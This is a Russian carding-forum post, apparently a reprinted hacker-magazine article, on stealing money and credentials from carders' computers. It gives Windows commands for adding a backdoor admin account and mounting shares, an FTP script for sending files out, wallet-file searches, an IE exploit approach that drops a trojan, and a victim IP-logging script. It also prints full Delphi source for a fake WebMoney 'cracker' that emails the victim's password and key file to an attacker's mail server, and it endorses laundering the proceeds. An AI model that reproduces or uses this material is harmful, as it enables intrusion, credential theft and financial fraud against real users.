Гоп-стоп в сети

Carding Forum

Professional
Messages
2,788
Reaction score
1,176
Points
113
Как обчищают богачей
Все люди зарабатывают себе на жизнь. Причем различными способами. Некоторые выбирают обогащение в виртуале. При этом сам заработок не всегда бывает честным. Человек рискует, проводит важные банковские операции, продает кредитки, покупает различные вещи... и в какой-то момент все теряет. Из-за собственной невнимательности его полностью обчищает хакер Вася из Мухосранска. Почему так происходит, и как взломщику удается напасть, на, казалось бы, защищенных кардеров? Давай попробуем разобраться.

Укротим систему!
Способов украсть ценную информацию и сбережения кардера очень много. Но стоит оговориться, что в этом деле главное не количество, а качество, то есть успешное применение этих способов.
Итак, самое время рассказать, как же хакер может украсть данные у жертвы. Во-первых, это взлом компьютера богатого буратино ;). Здесь - как повезет, ничего нельзя сказать наверняка. Если человек - раззява и не читает багтраки, то шансы хакера резко возрастают. В противном случае, да еще и с установленным на машине фаерволом, этот способ непригоден.
Как же ломают рабочие станции пользователей? Тут также существуют свои способы. Остановимся на бажной WinNT. Ты всегда думал, что если винда имеет префикс NT, то у нее стопроцентная защита? Я тебя разочарую. В таких платформах были найдены очень опасные баги.

RPC-эпидемия
Если ты не знаешь об RPC-уязвимости, то у тебя позднее зажигание ;). Об этой ошибке трубили все порталы по безопасности, а также было выпущено множество эксплоитов, в том числе и для Windows (рай для скрипткидисов). Как же хакер может поиметь бабла с наивного буржуя, который, наверное, и не знает о существовании патча от RPC-баги? Очень просто. Достаточно завладеть доступом к его системе и набрать ряд консольных команд. После этого все важные документы будут находиться в лапах злоумышленника.
Я не буду тебя учить эксплуатировать уязвимость. Об этом писали различные хакерские порталы, а также Хакер #9. Я лишь заострю твое внимание на командах, которые могут пригодиться взломщику, захватившему права на системе жертвы.
Чтобы не использовать шумный эксплоит (который, кстати, может разрушить RPC-вызовы и привести систему к краху) каждый раз, можно создать аккаунт администратора. Его, как известно, пустят на такие ресурсы, как C$, D$ и прочие. Это сделать очень легко. Достаточно лишь набрать следующие строки:
net user admin nimda /add (добавляем нового пользователя admin с паролем nimda, параметры можно подставить свои).
net localgroup Administrators admin /add (присвоим пользователю группу Administratots).
В случае, когда локализация платформы не английская, необходимо подставить название группы на родном языке. Для этого хакер набирает "net user" и узнает истинное название группы.
Если все было сделано верно (команда net обязательно сообщит хакеру о результате операции), взломщик может зайти на машину с локального компа. В этом ему помогает команда "net use z: \\IP-ADDRESS\C$". Но он этого никогда не сделает по одной простой причине - на машине ведутся логии, и его IP-адрес обязательно будет записан. Но выход есть - хакер заходит не с себя, а со своего любимого скарженного шелла.
smbclient //IP-ADDRESS/$C -U admin
Эта команда актуальна для Linux. После запроса пароля хакер попадает в системный ресурс $C (для того чтобы выполнить подобные действия, взломщик предварительно устанавливает на машину пакет samba).
Но иногда простого доступа к директориям недостаточно. Например, в том случае, когда необходимо протроянить юзера или поставить на машину кейлоггер (а также просмотреть лист процессов, убить один из них и т.д. и т.п.). В этом случае взломщик либо вешает дополнительный бэкдор, либо использует эксплоит каждый раз.

Кто ищет, тот всегда найдет
В поиске информации нет ничего хитрого. Если хакер нетерпелив (а таких мало), он просто шарит по папкам и выкачивает файлы с подозрительными именами (типа 1111.doc или paroli.doc). Текстовики можно прочитать на месте командой "type file". Многие руководства по взлому винды пишут об обязательном аккаунте на каком-либо TFTP-сервере. Однако можно выполнить операцию через обычную команду ftp. Предварительно составляется сценарий, который состоит из простых операций, передаваемых ftp. Он может выглядеть, например, следующим образом:
пример FTP-сценария
Code:
user vasya vasya123
type binary
put document.doc /xakep/document.doc
quit
После составления (команды сценария последовательно записываются в файл с помощью echo и стандартного перенаправления ввода) скрипта, он передается консольной утилите с помощью параметра -s:имя_файла. Следует учитывать, что аутентификация была произведена в одной команде, поэтому добавляем к командной строке опцию -n.
Следует отметить, что в винде нет команды поиска, которая присутствует в Linux. Но это совсем не означает, что найти файл в консоли невозможно. Предметом охоты для хакера являются кошельки WebMoney, которые имеют расширение kwm и pwm. Их можно найти следующей командой:
dir /S c:\ | find *.?wm
При этом будет выполняться рекурсивный вывод всех каталогов с диска c:\ и последующая фильтрация файлов с помощью команды find.

WebMoney - радость хакера
После того, как кошельки WebMoney будут скачаны, необходимо узнать идентификатор счета (это выполнит клиент), а также пароль на вход. Пароль на WebMoney не может быть изменен и задается всего один раз (аналог PIN-кода в кредитной карте), поэтому возможно, юзер записал его в файл, чтобы не забыть. При удачном стечении обстоятельств, хакер вытягивает этот файл и кошельки и полностью завладевает счетом жертвы. Внимание! Это очень опасно, поскольку система перевода денег имеет историю всех проведенных операций. Скажу по опыту, что у взломщиков есть свои люди, которые отмывают деньги на счете, беря за услуги некоторый процент от суммы.
Существуют и другие способы добычи пароля. Например, такой: хакер сумел узнать несколько паролей, которые жертва использует в Сети. Он пробует перебрать их все и, возможно, один из них будет верным. Когда способов не остается, можно найти подходящий кейлоггер, шлющий клавиатурный дамп на вражеский e-mail адрес. После того как он будет запущен на компьютере, остается только ждать, пока пользователь не воспользуется клиентом WebMoney. Существует способ для ускорения этого процесса - отправка жертве письма, в котором будет говориться о том, что кошелек был пополнен на энную сумму. Тогда-то он обязательно запустит клиент.
Вообще, есть еще один метод завладения WM-кошельком. Он практикуется среди богатых, но ламернутых личностей, которые недавно, но успешно постигают кардерские махинации. Создается программа, типа "крякера интернета", но она не крякает интернет, а уводит кошельки WebMoney. Реализовать ее - пара пустяков, проблема в другом - впарить прогу жертве. Это может сделать хороший хакер, имеющий богатый опыт в социальной инженерии.
Исходный код этой небольшой программы ты найдешь во врезке. Полный исходник проекта есть на диске.
Помимо самой службы WebMoney, есть сервис Merchant (http://merchant.webmoney.ru), который нужен для проведения онлайн-операций по переводу денег с одного WM-кошелька на другой. Обычно сервис применяется в различных проектах, например, интернет-магазинах. Если хакер взламывает подобный ресурс, он просто заменяет в исходном коде скрипта ссылку и параметры на свой кошелек WebMoney. При этом клиент будет пересылать деньги на счет злоумышленника. Бесспорно, это скоро будет замечено, но взломщик успеет обогатиться.

Бреши в ослике
RPC-уязвимость далеко не единственная бага в форточках. Рассмотрим еще один пример - ошибка в обработке тега <OBJECT>, позволяющая выполнять произвольный код на машине клиента. Реализовав такую уязвимость, хакеру ничего не стоит залить троян на жертву, да еще и записать в лог его IP-адрес, который впоследствии будет проверен на заражение бэкдором ;).
Для написания эксплоита достаточно создать следующий html-документ:
<object data="/object.html">Привет всем ;)</object>
А в object.html положить скрипт, например на Visual Basic. В нем будет производиться выкачивание трояна по указанному адресу и его последующий запуск. При желании можно пофантазировать с записью бэкдора в реестр (если, конечно, в нем уже не реализована подобная функция), но это исключительно проблемы взломщика.
Для записи IP-адреса в лог-файл надо написать простенький perl-скрипт. Например, такой:
Perl-скрипт для записи адреса в лог
Code:
#!/usr/bin/perl
print "Content-type: text/html\n\n";
$ip=$ENV{REMOTE_ADDR};
open(LOG,">>ipz.log");
print LOG "$ip\n";
close(LOG);
На этот сценарий делается редирект с главной страницы, либо вызывается SSI-вкладка, к примеру, следующая:
Code:
<!--#exec cgi="/path/to/iplog.cgi"-->.
Следует помнить, что для выполнения SSI-вставок, файлу необходимо дать расширение shtml. Что касается файлов для записи (ipz.log), то они должны иметь атрибут 666.
Смысл этого метода заключается в засылке вредоносных программ на компьютер жертвы, используя бреши в операционной системе. Регулярно обновляемый список уязвимостей ты можешь найти на любом портале по безопасности.

А как же Linux?
Что касается Linux, то все методы этой, казалось бы, неприступной системы были изложены в статье этого номера "Найди и поимей!". В этой системе можно найти, пожалуй, только кредитные карты и файлы, хранящие в себе пароли, а также аккаунты на какие-либо ресурсы.
Эффективным способом хищения информации является снифинг данных. Снифер - программа, которая перехватывает весь трафик на определенных интерфейсах и отбирает из него инфу, которая указана в конфе снифака. Программ, которые перехватывают весь трафик и записывают его в логи (при этом фильтрация остается проблемой хакера), довольно мало. В основном, сниферы удобно настраиваются и незаметно запускаются на сервере.
Принцип всех сниферов основан, как я уже сказал, на перехвате данных определенного сетевого интерфейса. При этом устанавливается режим promisc, при котором все данные проходят через сетевую карту, несмотря на то, что предназначены они были для других машин. Ты, наверное, догадываешься, что успешно заюзать снифер можно лишь на компьютерах, которые выполняют функцию маршрутизаторов. Если это так, то хакер будет перехватывать весь трафик в локальной сети.
В последнее время сниферы пишут очень грамотные люди. Их не способны засечь никакие утилиты, типа ps, ifconfig, IDS и прочие.
Еще одним интересным способом взлома является брутфорсинг (перебор) паролей на определенный сервис. Я слышал о таких приватных проектах, как переборщик https-аккаунтов. Таким образом, взломать учетную запись бизнесмена на каком-либо секурном сервисе вполне реально.
Я уже не говорю о переборе паролей на небезопасных сервисах, которые поддаются снифингу. Таких брутфорсеров в интернете навалом, и большинство из них поддерживают многопоточный перебор. Конечно, прошли времена, когда в качестве аккаунтов применялись пары root/root или admin/admin, но словарные пароли встречаются очень часто. Так что подобрать пароль становится вполне реальным.
Таким образом, подвожу итог. Воровство аккаунтов - наболевшая тема. Воруют все кому не лень, и то, что плохо лежит. Поэтому, если ты преуспевающий сетевой бизнесмен, рекомендую защитить свою систему необходимыми патчами, а также грамотно настроенным фаерволом. Только тогда ты будешь в абсолютной безопасности.

Кодинг
Настало время представить проект, реализующий «крякер» кошельков WebMoney. На самом деле, эта фейк-программа просто отсылает все ключи и пароль на мыло злоумышленника.
Для реализации задуманного потребуются следующие компоненты:
5 Label (текст, вкладка Standard), 5 Edit (вводимый текст, вкладка Standard), 3 Button (кнопка, вкладка Standard),Memo (Текстовое поле, вкладка Standard) и ProgressBar (вкладка Win32), а также компоненты NMSMTP(вкладка FastNet) и OpenDialog(вкладка Dialogs).

Назначаем caption кнопкам и текстовым полям.
Code:
Label1.Caption := 'WM (Webmoney Identificator)';
Label2.Caption := 'Кошелек (Пример: Z143365768493)';
Label3.Caption := 'Пароль WM';
Label4.Caption := 'Путь к файлу ключей';
Label5.Caption := 'Сумма для перевода';
затем кнопкам:
Button1.Caption := 'Обзор';
Button2.Caption := 'Генерировать';
Button3.Caption := 'Отмена';
Полю Memo ставим текст, тоже через переменные:
memo1.text := 'Примечание:'+#13#10+
'Размер файла ключей должен быть минимальным, т.к. программа изменяет его содержимое и закачивает на сервер.'+#13#10+
'Если размер будет более 1 мегабайта, то компания WebMoney заметит среди своих'+#13#10+
'ключей - твой, который имеет большой размер.';
События для нажатых кнопок:
// Обзор
procedure TForm1.Button1Click(Sender: TObject);
begin
// если диалог удачно запущен то
if opendialog1.Execute then
// записываем имя файла
Edit4.Text := opendialog1.FileName;
end;
// Генерировать
procedure TForm1.Button2Click(Sender: TObject);
begin
// ProgressBar1 - изменение положения ползунка прогресс-бара
ProgressBar1.Position:=0;
// Вложенные файлы
NMSMTP1.PostMessage.Attachments.Text := Edit4.text;
ProgressBar1.Position :=ProgressBar1.Position+10;
// Body отправляемого письма
NMSMTP1.PostMessage.Body.Text := 'WmCrack 9.1.2 PRO Message'+#13#10+
'Some lame use you programm...:)'+#13#10+
'WM ID: '+Edit1.text+#13#10+
'Z or E or R: '+Edit2.text+#13#10+
'Pass:): '+edit3.text+#13#10+
'File.kwm: '+Edit4.text+#13#10+
'Money: '+Edit5.text;
ProgressBar1.Position:=ProgressBar1.Position+10;
// Тема письма
NMSMTP1.PostMessage.Subject :='>>>WMCRACK*************';
ProgressBar1.Position:=ProgressBar1.Position+10;
// Имя программы, которая отправляла письмо
NMSMTP1.PostMessage.LocalProgram :='SomeShit';
ProgressBar1.Position:=ProgressBar1.Position+10;
// Reply-To адрес
NMSMTP1.PostMessage.ReplyTo :='fake@thecc.ru';
ProgressBar1.Position:=ProgressBar1.Position+10;
// Почта отправителя
NMSMTP1.PostMessage.FromAddress :='fake@thecc.ru';
ProgressBar1.Position:=ProgressBar1.Position+10;
// Имя отправителя
NMSMTP1.PostMessage.FromName :=':WMCrack:';
ProgressBar1.Position:=ProgressBar1.Position+10;
// E-mail хакера
NMSMTP1.PostMessage.ToAddress.text :='yourmail@i-have.cc';
ProgressBar1.Position:=ProgressBar1.Position+10;
// SMTP сервер хакера
NMSMTP1.Host := 'i-have.cc';
ProgressBar1.Position:=ProgressBar1.Position+10;
// Отсылка письма
NMSMTP1.SendMail;
ProgressBar1.Position:=100;
// Сообщение об удачной отправке денег жертве
Showmessage('Обновите свой WM Keeper, сумма должна придти в течение 1-2 минут.');
end;
// Отмена
procedure TForm1.Button3Click(Sender: TObject);
begin
NMSMTP1.Abort;
// Прогресс-бар ставим на 0
ProgressBar1.Position :=0;
end;

Обзор сниферов
Как я уже говорил, в инете полно сниферов. На первый взгляд разобраться в них не так-то просто, поэтому публикую небольшой обзор программ-нюхачей.
Sniffit. Один из первых сниферов, который по-прежнему является очень популярным. Он сохраняет первые 400 байтов пакета по умолчанию, но хакер может настроить его так, чтобы он перехватывал пароль жертвы.
TCPdump. Знаменитый снифер. Считается профессиональным административным средством.
ADMsniff. Известная, очень квалифицированная группа хакеров ADM написала отличный снифер. Определенно советую посмотреть, т.к. все, что они делают, стоит внимания.
Linsniffer. Популярный снифер, разработанный для платформ Linux.
Sunsniff. Этот снифер выполнен под платформу SunOS. Возможно, один из самых известных сниферов, сделанный почти десять лет назад.

Поломали?
Если ты оказался в лапах хакера, то, возможно, у тебя бреши в операционке. Обязательно читай bugtraq и вовремя накладывай патчи на свою систему. Взять их можно на www.microsoft.com/.
Способов украсть ценную информацию и сбережения кардера очень много.
Я не буду тебя учить эксплуатировать уязвимость. Об этом писали различные хакерские порталы, а также Хакер #9. Я лишь заострю твое внимание на командах, которые могут пригодиться взломщику, захватившему права на системе жертвы.
В поиске информации нет ничего хитрого. Если хакер нетерпелив (а таких мало), он просто шарит по папкам и выкачивает файлы с подозрительными именами (типа 1111.doc или paroli.doc). Текстовики можно прочитать на месте командой "type file".
Если хакер взламывает подобный ресурс, он просто заменяет в исходном коде скрипта ссылку и параметры на свой кошелек WebMoney.
Следует помнить, что для выполнения SSI-вставок, файлу необходимо дать расширение shtml.
Эффективным способом хищения информации является снифинг данных. Снифер - программа, которая перехватывает весь трафик на определенных интерфейсах и отбирает из него инфу, которая указана в конфе снифака.
Еще одним интересным способом взлома является брутфорсинг (перебор) паролей на определенный сервис. Я слышал о таких приватных проектах, как переборщик https-аккаунтов.
 
Top